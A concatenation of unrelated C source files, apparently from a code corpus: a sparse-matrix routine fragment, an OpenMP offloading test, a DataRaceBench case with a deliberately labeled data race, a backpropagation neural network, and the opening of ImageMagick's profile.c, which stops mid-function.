void transposed_spmv_cds(const Matrix& A,
const Vector1& x,
Vector2& y)
{
typedef typename Vector2::value_type ValueType;
if (A.block_size == 1) {
transposed_spmv_dia(A, x, y,
cusp::detail::zero_function<ValueType>(),
thrust::multiplies<ValueType>(),
thrust::plus<ValueType>());
} else {
transposed_spmv_cds(A, x, y,
cusp::detail::zero_function<ValueType>(),
thrust::multiplies<ValueType>(),
thrust::plus<ValueType>());
}
}
} // end namespace host
} // end namespace detail
} // end namespace cusp
|
device_ptr_update.c | // RUN: %libomptarget-compile-generic
// RUN: env LIBOMPTARGET_DEBUG=1 %libomptarget-run-generic 2>&1 \
// RUN: | %fcheck-generic -check-prefix=DEBUG -check-prefix=CHECK
// REQUIRES: libomptarget-debug
#include <stdio.h>
struct S {
int *p;
};
int main(void) {
int A[10];
struct S s1;
s1.p = A;
// DEBUG: Update pointer ([[DEV_PTR:0x[^ ]+]]) -> {{\[}}[[DEV_OBJ_A:0x[^ ]+]]{{\]}}
#pragma omp target enter data map(alloc : s1.p [0:10])
// DEBUG-NOT: Update pointer ([[DEV_PTR]]) -> {{\[}}[[DEV_OBJ_A]]{{\]}}
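// (The enter-data directive above attached s1.p to the device copy of A;
// the target construct below reuses that attachment, which is why no second
// pointer-update message may appear in the debug output.)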
#pragma omp target map(alloc : s1.p [0:10])
{
for (int i = 0; i < 10; ++i)
s1.p[i] = i;
}
#pragma omp target exit data map(from : s1.p [0:10])
int fail_A = 0;
for (int i = 0; i < 10; ++i) {
if (A[i] != i) {
fail_A = 1;
break;
}
}
// CHECK-NOT: Test A failed
if (fail_A) {
printf("Test A failed\n");
}
return fail_A;
}
|
DRB002-antidep1-var-yes.c | /*
Copyright (c) 2017, Lawrence Livermore National Security, LLC.
Produced at the Lawrence Livermore National Laboratory
Written by Chunhua Liao, Pei-Hung Lin, Joshua Asplund,
Markus Schordan, and Ian Karlin
(email: liao6@llnl.gov, lin32@llnl.gov, asplund1@llnl.gov,
schordan1@llnl.gov, karlin1@llnl.gov)
LLNL-CODE-732144
All rights reserved.
This file is part of DataRaceBench. For details, see
https://github.com/LLNL/dataracebench. Please also see the LICENSE file
for our additional BSD notice.
Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
A loop with loop-carried anti-dependence.
Data race pair: a[i+1]@67:10 vs. a[i]@67:5
*/
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char* argv[])
{
int i;
int len = 1000;
if (argc>1)
len = atoi(argv[1]);
int a[len];
for (i=0; i<len; i++)
a[i]= i;
/* The loop below carries the anti-dependence documented above: iteration i
   reads a[i+1] while iteration i+1 writes it, so parallelizing it yields
   the stated data race pair. */
#pragma omp parallel for private(i)
for (i=0;i< len -1 ;i++)
a[i]=a[i+1]+1;
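/* Hedged sketch (not part of the benchmark): the anti-dependence can be
   broken by reading from a copy, after which the loop parallelizes safely:
       int* b = (int*) malloc(sizeof(int)*len);
       memcpy(b, a, sizeof(int)*len);      needs <string.h> for memcpy
       #pragma omp parallel for private(i)
       for (i=0; i<len-1; i++)
         a[i] = b[i+1] + 1;
       free(b);
*/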
for (i=0; i<len; i++)
printf("%d\n", a[i]);
return 0;
}
|
backprop.c | /*
******************************************************************
* HISTORY
* 15-Oct-94 Jeff Shufelt (js), Carnegie Mellon University
* Prepared for 15-681, Fall 1994.
* Modified by Shuai Che
******************************************************************
*/
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
#include "backprop.h"
#include <math.h>
#include <fcntl.h>  /* open() used by bpnn_read() */
#include <unistd.h> /* read()/close() used by bpnn_read() */
//#define OPEN
#define ABS(x) (((x) > 0.0) ? (x) : (-(x)))
#define fastcopy(to,from,len)\
{\
register char *_to,*_from;\
register int _i,_l;\
_to = (char *)(to);\
_from = (char *)(from);\
_l = (len);\
for (_i = 0; _i < _l; _i++) *_to++ = *_from++;\
}
/*** Return random number between 0.0 and 1.0 ***/
float drnd()
{
return ((float) rand() / (float) BIGRND);
}
/*** Return random number between -1.0 and 1.0 ***/
float dpn1()
{
return ((drnd() * 2.0) - 1.0);
}
/*** The squashing function. Currently, it's a sigmoid. ***/
float squash(x)
float x;
{
float m;
//x = -x;
//m = 1 + x + x*x/2 + x*x*x/6 + x*x*x*x/24 + x*x*x*x*x/120;
//return(1.0 / (1.0 + m));
return (1.0 / (1.0 + exp(-x)));
}
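/* Note: for the sigmoid s(x) = 1/(1+exp(-x)) the derivative satisfies
   s'(x) = s(x) * (1 - s(x)); this identity is why bpnn_output_error() and
   bpnn_hidden_error() below compute their error terms as o * (1.0 - o). */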
/*** Allocate 1d array of floats ***/
float *alloc_1d_dbl(n)
int n;
{
float *new;
new = (float *) malloc ((unsigned) (n * sizeof (float)));
if (new == NULL) {
printf("ALLOC_1D_DBL: Couldn't allocate array of floats\n");
return (NULL);
}
return (new);
}
/*** Allocate 2d array of floats ***/
float **alloc_2d_dbl(m, n)
int m, n;
{
int i;
float **new;
new = (float **) malloc ((unsigned) (m * sizeof (float *)));
if (new == NULL) {
printf("ALLOC_2D_DBL: Couldn't allocate array of dbl ptrs\n");
return (NULL);
}
for (i = 0; i < m; i++) {
new[i] = alloc_1d_dbl(n);
}
return (new);
}
void bpnn_randomize_weights(w, m, n)
float **w;
int m, n;
{
int i, j;
for (i = 0; i <= m; i++) {
for (j = 0; j <= n; j++) {
w[i][j] = (float) rand()/RAND_MAX;
// w[i][j] = dpn1();
}
}
}
void bpnn_randomize_row(w, m)
float *w;
int m;
{
int i;
for (i = 0; i <= m; i++) {
//w[i] = (float) rand()/RAND_MAX;
w[i] = 0.1;
}
}
void bpnn_zero_weights(w, m, n)
float **w;
int m, n;
{
int i, j;
for (i = 0; i <= m; i++) {
for (j = 0; j <= n; j++) {
w[i][j] = 0.0;
}
}
}
void bpnn_initialize(seed)
int seed;
{
printf("Random number generator seed: %d\n", seed);
srand(seed);
}
BPNN *bpnn_internal_create(n_in, n_hidden, n_out)
int n_in, n_hidden, n_out;
{
BPNN *newnet;
newnet = (BPNN *) malloc (sizeof (BPNN));
if (newnet == NULL) {
printf("BPNN_CREATE: Couldn't allocate neural network\n");
return (NULL);
}
newnet->input_n = n_in;
newnet->hidden_n = n_hidden;
newnet->output_n = n_out;
newnet->input_units = alloc_1d_dbl(n_in + 1);
newnet->hidden_units = alloc_1d_dbl(n_hidden + 1);
newnet->output_units = alloc_1d_dbl(n_out + 1);
newnet->hidden_delta = alloc_1d_dbl(n_hidden + 1);
newnet->output_delta = alloc_1d_dbl(n_out + 1);
newnet->target = alloc_1d_dbl(n_out + 1);
newnet->input_weights = alloc_2d_dbl(n_in + 1, n_hidden + 1);
newnet->hidden_weights = alloc_2d_dbl(n_hidden + 1, n_out + 1);
newnet->input_prev_weights = alloc_2d_dbl(n_in + 1, n_hidden + 1);
newnet->hidden_prev_weights = alloc_2d_dbl(n_hidden + 1, n_out + 1);
return (newnet);
}
void bpnn_free(net)
BPNN *net;
{
int n1, n2, i;
n1 = net->input_n;
n2 = net->hidden_n;
free((char *) net->input_units);
free((char *) net->hidden_units);
free((char *) net->output_units);
free((char *) net->hidden_delta);
free((char *) net->output_delta);
free((char *) net->target);
for (i = 0; i <= n1; i++) {
free((char *) net->input_weights[i]);
free((char *) net->input_prev_weights[i]);
}
free((char *) net->input_weights);
free((char *) net->input_prev_weights);
for (i = 0; i <= n2; i++) {
free((char *) net->hidden_weights[i]);
free((char *) net->hidden_prev_weights[i]);
}
free((char *) net->hidden_weights);
free((char *) net->hidden_prev_weights);
free((char *) net);
}
/*** Creates a new fully-connected network from scratch,
with the given numbers of input, hidden, and output units.
Threshold units are automatically included. All weights are
randomly initialized.
Space is also allocated for temporary storage (momentum weights,
error computations, etc).
***/
BPNN *bpnn_create(n_in, n_hidden, n_out)
int n_in, n_hidden, n_out;
{
BPNN *newnet;
newnet = bpnn_internal_create(n_in, n_hidden, n_out);
#ifdef INITZERO
bpnn_zero_weights(newnet->input_weights, n_in, n_hidden);
#else
bpnn_randomize_weights(newnet->input_weights, n_in, n_hidden);
#endif
bpnn_randomize_weights(newnet->hidden_weights, n_hidden, n_out);
bpnn_zero_weights(newnet->input_prev_weights, n_in, n_hidden);
bpnn_zero_weights(newnet->hidden_prev_weights, n_hidden, n_out);
bpnn_randomize_row(newnet->target, n_out);
return (newnet);
}
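/* Hedged usage sketch (not part of the original file; the layer sizes and
   seed below are made-up placeholders):
       BPNN *net = bpnn_create(16, 16, 1);
       bpnn_initialize(7);
       ... fill net->input_units[1..16] and net->target[1] ...
       float out_err, hid_err;
       bpnn_train(net, &out_err, &hid_err);
       bpnn_save(net, "net.dat");
       bpnn_free(net);
*/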
void bpnn_layerforward(l1, l2, conn, n1, n2)
float *l1, *l2, **conn;
int n1, n2;
{
float sum;
int j, k;
/*** Set up thresholding unit ***/
l1[0] = 1.0;
#ifdef OPEN
omp_set_num_threads(NUM_THREAD);
#pragma omp parallel for shared(conn, n1, n2, l1) private(k, j) reduction(+: sum) schedule(static)
#endif
/*** For each unit in second layer ***/
for (j = 1; j <= n2; j++) {
/*** Compute weighted sum of its inputs ***/
sum = 0.0;
for (k = 0; k <= n1; k++) {
sum += conn[k][j] * l1[k];
}
l2[j] = squash(sum);
}
}
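/* The loop above computes l2[j] = squash( sum_{k=0..n1} conn[k][j]*l1[k] )
   for j = 1..n2; l1[0] is pinned to 1.0 so conn[0][j] acts as the bias
   (threshold) weight of unit j. */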
//extern "C"
void bpnn_output_error(delta, target, output, nj, err)
float *delta, *target, *output, *err;
int nj;
{
int j;
float o, t, errsum;
errsum = 0.0;
for (j = 1; j <= nj; j++) {
o = output[j];
t = target[j];
delta[j] = o * (1.0 - o) * (t - o);
errsum += ABS(delta[j]);
}
*err = errsum;
}
void bpnn_hidden_error(delta_h,
nh,
delta_o,
no,
who,
hidden,
err)
float *delta_h, *delta_o, *hidden, **who, *err;
int nh, no;
{
int j, k;
float h, sum, errsum;
errsum = 0.0;
for (j = 1; j <= nh; j++) {
h = hidden[j];
sum = 0.0;
for (k = 1; k <= no; k++) {
sum += delta_o[k] * who[j][k];
}
delta_h[j] = h * (1.0 - h) * sum;
errsum += ABS(delta_h[j]);
}
*err = errsum;
}
void bpnn_adjust_weights(delta, ndelta, ly, nly, w, oldw)
float *delta, *ly, **w, **oldw;
{
float new_dw;
int k, j;
ly[0] = 1.0;
//eta = 0.3;
//momentum = 0.3;
#ifdef OPEN
omp_set_num_threads(NUM_THREAD);
/* Note: MOMENTUM is a macro constant, not a variable, so it cannot appear
   in a data-sharing clause. */
#pragma omp parallel for \
shared(oldw, w, delta) \
private(j, k, new_dw) \
firstprivate(ndelta, nly)
#endif
for (j = 1; j <= ndelta; j++) {
for (k = 0; k <= nly; k++) {
new_dw = ((ETA * delta[j] * ly[k]) + (MOMENTUM * oldw[k][j]));
w[k][j] += new_dw;
oldw[k][j] = new_dw;
}
}
}
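/* The update above is the classic momentum rule:
     dw_kj(t) = ETA * delta_j * y_k + MOMENTUM * dw_kj(t-1)
     w_kj    += dw_kj(t)
   with oldw[][] holding the previous step dw(t-1). */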
void bpnn_feedforward(net)
BPNN *net;
{
int in, hid, out;
in = net->input_n;
hid = net->hidden_n;
out = net->output_n;
/*** Feed forward input activations. ***/
bpnn_layerforward(net->input_units, net->hidden_units,
net->input_weights, in, hid);
bpnn_layerforward(net->hidden_units, net->output_units,
net->hidden_weights, hid, out);
}
void bpnn_train(net, eo, eh)
BPNN *net;
float *eo, *eh;
{
int in, hid, out;
float out_err, hid_err;
in = net->input_n;
hid = net->hidden_n;
out = net->output_n;
/*** Feed forward input activations. ***/
bpnn_layerforward(net->input_units, net->hidden_units,
net->input_weights, in, hid);
bpnn_layerforward(net->hidden_units, net->output_units,
net->hidden_weights, hid, out);
/*** Compute error on output and hidden units. ***/
bpnn_output_error(net->output_delta, net->target, net->output_units,
out, &out_err);
bpnn_hidden_error(net->hidden_delta, hid, net->output_delta, out,
net->hidden_weights, net->hidden_units, &hid_err);
*eo = out_err;
*eh = hid_err;
/*** Adjust input and hidden weights. ***/
bpnn_adjust_weights(net->output_delta, out, net->hidden_units, hid,
net->hidden_weights, net->hidden_prev_weights);
bpnn_adjust_weights(net->hidden_delta, hid, net->input_units, in,
net->input_weights, net->input_prev_weights);
}
void bpnn_save(net, filename)
BPNN *net;
char *filename;
{
int n1, n2, n3, i, j, memcnt;
float dvalue, **w;
char *mem;
///add//
FILE *pFile;
pFile = fopen( filename, "w+" );
///////
/*
if ((fd = creat(filename, 0644)) == -1) {
printf("BPNN_SAVE: Cannot create '%s'\n", filename);
return;
}
*/
n1 = net->input_n; n2 = net->hidden_n; n3 = net->output_n;
printf("Saving %dx%dx%d network to '%s'\n", n1, n2, n3, filename);
//fflush(stdout);
//write(fd, (char *) &n1, sizeof(int));
//write(fd, (char *) &n2, sizeof(int));
//write(fd, (char *) &n3, sizeof(int));
fwrite( (char *) &n1 , sizeof(int), 1, pFile);
fwrite( (char *) &n2 , sizeof(int), 1, pFile);
fwrite( (char *) &n3 , sizeof(int), 1, pFile);
memcnt = 0;
w = net->input_weights;
mem = (char *) malloc ((unsigned) ((n1+1) * (n2+1) * sizeof(float)));
for (i = 0; i <= n1; i++) {
for (j = 0; j <= n2; j++) {
dvalue = w[i][j];
fastcopy(&mem[memcnt], &dvalue, sizeof(float));
memcnt += sizeof(float);
}
}
//write(fd, mem, (n1+1) * (n2+1) * sizeof(float));
fwrite( mem , sizeof(float), (unsigned) ((n1+1) * (n2+1)) , pFile);
free(mem);
memcnt = 0;
w = net->hidden_weights;
mem = (char *) malloc ((unsigned) ((n2+1) * (n3+1) * sizeof(float)));
for (i = 0; i <= n2; i++) {
for (j = 0; j <= n3; j++) {
dvalue = w[i][j];
fastcopy(&mem[memcnt], &dvalue, sizeof(float));
memcnt += sizeof(float);
}
}
//write(fd, mem, (n2+1) * (n3+1) * sizeof(float));
fwrite( mem , sizeof(float), (unsigned) ((n2+1) * (n3+1)) , pFile);
free(mem);
fclose(pFile);
return;
}
BPNN *bpnn_read(filename)
char *filename;
{
char *mem;
BPNN *new;
int fd, n1, n2, n3, i, j, memcnt;
if ((fd = open(filename, 0, 0644)) == -1) {
return (NULL);
}
printf("Reading '%s'\n", filename); //fflush(stdout);
read(fd, (char *) &n1, sizeof(int));
read(fd, (char *) &n2, sizeof(int));
read(fd, (char *) &n3, sizeof(int));
new = bpnn_internal_create(n1, n2, n3);
printf("'%s' contains a %dx%dx%d network\n", filename, n1, n2, n3);
printf("Reading input weights..."); //fflush(stdout);
memcnt = 0;
mem = (char *) malloc ((unsigned) ((n1+1) * (n2+1) * sizeof(float)));
read(fd, mem, (n1+1) * (n2+1) * sizeof(float));
for (i = 0; i <= n1; i++) {
for (j = 0; j <= n2; j++) {
fastcopy(&(new->input_weights[i][j]), &mem[memcnt], sizeof(float));
memcnt += sizeof(float);
}
}
free(mem);
printf("Done\nReading hidden weights..."); //fflush(stdout);
memcnt = 0;
mem = (char *) malloc ((unsigned) ((n2+1) * (n3+1) * sizeof(float)));
read(fd, mem, (n2+1) * (n3+1) * sizeof(float));
for (i = 0; i <= n2; i++) {
for (j = 0; j <= n3; j++) {
fastcopy(&(new->hidden_weights[i][j]), &mem[memcnt], sizeof(float));
memcnt += sizeof(float);
}
}
free(mem);
close(fd);
printf("Done\n"); //fflush(stdout);
bpnn_zero_weights(new->input_prev_weights, n1, n2);
bpnn_zero_weights(new->hidden_prev_weights, n2, n3);
return (new);
}
|
profile.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% PPPP RRRR OOO FFFFF IIIII L EEEEE %
% P P R R O O F I L E %
% PPPP RRRR O O FFF I L EEE %
% P R R O O F I L E %
% P R R OOO F IIIII LLLLL EEEEE %
% %
% %
% MagickCore Image Profile Methods %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2018 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "magick/studio.h"
#include "magick/attribute.h"
#include "magick/cache.h"
#include "magick/color.h"
#include "magick/colorspace-private.h"
#include "magick/configure.h"
#include "magick/exception.h"
#include "magick/exception-private.h"
#include "magick/hashmap.h"
#include "magick/image.h"
#include "magick/memory_.h"
#include "magick/monitor.h"
#include "magick/monitor-private.h"
#include "magick/option.h"
#include "magick/option-private.h"
#include "magick/profile.h"
#include "magick/property.h"
#include "magick/quantum.h"
#include "magick/quantum-private.h"
#include "magick/resource_.h"
#include "magick/splay-tree.h"
#include "magick/string_.h"
#include "magick/thread-private.h"
#include "magick/token.h"
#include "magick/utility.h"
#if defined(MAGICKCORE_LCMS_DELEGATE)
#if defined(MAGICKCORE_HAVE_LCMS_LCMS2_H)
#include <wchar.h>
#include <lcms/lcms2.h>
#else
#include <wchar.h>
#include "lcms2.h"
#endif
#endif
/*
Definitions
*/
#define LCMSHDRI
#if !defined(MAGICKCORE_HDRI_SUPPORT)
#if (MAGICKCORE_QUANTUM_DEPTH == 8)
#undef LCMSHDRI
#define LCMSScaleSource(pixel) ScaleQuantumToShort(pixel)
#define LCMSScaleTarget(pixel) ScaleShortToQuantum(pixel)
typedef unsigned short
LCMSType;
#elif (MAGICKCORE_QUANTUM_DEPTH == 16)
#undef LCMSHDRI
#define LCMSScaleSource(pixel) (pixel)
#define LCMSScaleTarget(pixel) (pixel)
typedef unsigned short
LCMSType;
#endif
#endif
#if defined(LCMSHDRI)
#define LCMSScaleSource(pixel) (source_scale*QuantumScale*(pixel))
#define LCMSScaleTarget(pixel) ClampToQuantum(target_scale*QuantumRange*(pixel))
typedef double
LCMSType;
#endif
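/*
  Example of the scaling above: in a non-HDRI Q8 build a quantum of 255
  becomes ScaleQuantumToShort(255) = 65535 before the lcms transform and is
  scaled back afterwards, while a Q16 build passes the 16-bit quantum
  through unchanged. In HDRI builds pixels travel as doubles:
  LCMSScaleSource() maps the quantum range onto the double range lcms
  expects (source_scale is 100.0 for Lab and CMYK, whose lcms doubles run
  0..100), and LCMSScaleTarget() clamps the result back to quantum range.
*/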
/*
Forward declarations
*/
static MagickBooleanType
SetImageProfileInternal(Image *,const char *,const StringInfo *,
const MagickBooleanType);
static void
WriteTo8BimProfile(Image *,const char*,const StringInfo *);
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CloneImageProfiles() clones one or more image profiles.
%
% The format of the CloneImageProfiles method is:
%
% MagickBooleanType CloneImageProfiles(Image *image,
% const Image *clone_image)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o clone_image: the clone image.
%
*/
MagickExport MagickBooleanType CloneImageProfiles(Image *image,
const Image *clone_image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(clone_image != (const Image *) NULL);
assert(clone_image->signature == MagickCoreSignature);
image->color_profile.length=clone_image->color_profile.length;
image->color_profile.info=clone_image->color_profile.info;
image->iptc_profile.length=clone_image->iptc_profile.length;
image->iptc_profile.info=clone_image->iptc_profile.info;
if (clone_image->profiles != (void *) NULL)
{
if (image->profiles != (void *) NULL)
DestroyImageProfiles(image);
image->profiles=CloneSplayTree((SplayTreeInfo *) clone_image->profiles,
(void *(*)(void *)) ConstantString,(void *(*)(void *)) CloneStringInfo);
}
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e l e t e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DeleteImageProfile() deletes a profile from the image by its name.
%
% The format of the DeleteImageProfile method is:
%
% MagickBooleanType DeleteImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport MagickBooleanType DeleteImageProfile(Image *image,const char *name)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return(MagickFalse);
if (LocaleCompare(name,"icc") == 0)
{
/*
Continue to support deprecated color profile for now.
*/
image->color_profile.length=0;
image->color_profile.info=(unsigned char *) NULL;
}
if (LocaleCompare(name,"iptc") == 0)
{
/*
Continue to support deprecated IPTC profile for now.
*/
image->iptc_profile.length=0;
image->iptc_profile.info=(unsigned char *) NULL;
}
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
return(DeleteNodeFromSplayTree((SplayTreeInfo *) image->profiles,name));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyImageProfiles() releases memory associated with an image profile map.
%
% The format of the DestroyImageProfiles method is:
%
% void DestroyImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport void DestroyImageProfiles(Image *image)
{
if (image->profiles != (SplayTreeInfo *) NULL)
image->profiles=DestroySplayTree((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageProfile() gets a profile associated with an image by name.
%
% The format of the GetImageProfile method is:
%
% const StringInfo *GetImageProfile(const Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport const StringInfo *GetImageProfile(const Image *image,
const char *name)
{
const StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
profile=(const StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t N e x t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetNextImageProfile() gets the next profile name for an image.
%
% The format of the GetNextImageProfile method is:
%
% char *GetNextImageProfile(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport char *GetNextImageProfile(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((char *) NULL);
return((char *) GetNextKeyInSplayTree((SplayTreeInfo *) image->profiles));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% P r o f i l e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ProfileImage() associates, applies, or removes an ICM, IPTC, or generic
% profile with / to / from an image. If the profile is NULL, it is removed
% from the image; otherwise it is added or applied. Use a name of '*' and a
% profile of NULL to remove all profiles from the image.
%
% ICC and ICM profiles are handled as follows: If the image does not have
% an associated color profile, the one you provide is associated with the
% image and the image pixels are not transformed. Otherwise, the colorspace
% transform defined by the existing and new profiles is applied to the image
% pixels, and the new profile is associated with the image.
%
% The format of the ProfileImage method is:
%
% MagickBooleanType ProfileImage(Image *image,const char *name,
% const void *datum,const size_t length,const MagickBooleanType clone)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: Name of profile to add or remove: ICC, IPTC, or generic profile.
%
% o datum: the profile data.
%
% o length: the length of the profile.
%
% o clone: should be MagickFalse.
%
*/
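/*
  Hedged usage sketch (illustrative only; "icc_datum" and "icc_length" stand
  in for profile bytes obtained by the caller):

    (void) ProfileImage(image,"icc",icc_datum,icc_length,MagickFalse);
    (void) ProfileImage(image,"*",(const void *) NULL,0,MagickFalse);

  The first call associates the color profile (or applies it when an ICC
  profile is already attached); the second removes every profile from the
  image, per the contract described above.
*/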
#if defined(MAGICKCORE_LCMS_DELEGATE)
static LCMSType **DestroyPixelThreadSet(LCMSType **pixels)
{
register ssize_t
i;
if (pixels == (LCMSType **) NULL)
return((LCMSType **) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (pixels[i] != (LCMSType *) NULL)
pixels[i]=(LCMSType *) RelinquishMagickMemory(pixels[i]);
pixels=(LCMSType **) RelinquishMagickMemory(pixels);
return(pixels);
}
static LCMSType **AcquirePixelThreadSet(const size_t columns,
const size_t channels)
{
LCMSType
**pixels;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
pixels=(LCMSType **) AcquireQuantumMemory(number_threads,sizeof(*pixels));
if (pixels == (LCMSType **) NULL)
return((LCMSType **) NULL);
(void) memset(pixels,0,number_threads*sizeof(*pixels));
for (i=0; i < (ssize_t) number_threads; i++)
{
pixels[i]=(LCMSType *) AcquireQuantumMemory(columns,channels*
sizeof(**pixels));
if (pixels[i] == (LCMSType *) NULL)
return(DestroyPixelThreadSet(pixels));
}
return(pixels);
}
static cmsHTRANSFORM *DestroyTransformThreadSet(cmsHTRANSFORM *transform)
{
register ssize_t
i;
assert(transform != (cmsHTRANSFORM *) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (transform[i] != (cmsHTRANSFORM) NULL)
cmsDeleteTransform(transform[i]);
transform=(cmsHTRANSFORM *) RelinquishMagickMemory(transform);
return(transform);
}
static cmsHTRANSFORM *AcquireTransformThreadSet(Image *image,
const cmsHPROFILE source_profile,const cmsUInt32Number source_type,
const cmsHPROFILE target_profile,const cmsUInt32Number target_type,
const int intent,const cmsUInt32Number flags)
{
cmsHTRANSFORM
*transform;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
transform=(cmsHTRANSFORM *) AcquireQuantumMemory(number_threads,
sizeof(*transform));
if (transform == (cmsHTRANSFORM *) NULL)
return((cmsHTRANSFORM *) NULL);
(void) memset(transform,0,number_threads*sizeof(*transform));
for (i=0; i < (ssize_t) number_threads; i++)
{
transform[i]=cmsCreateTransformTHR((cmsContext) image,source_profile,
source_type,target_profile,target_type,intent,flags);
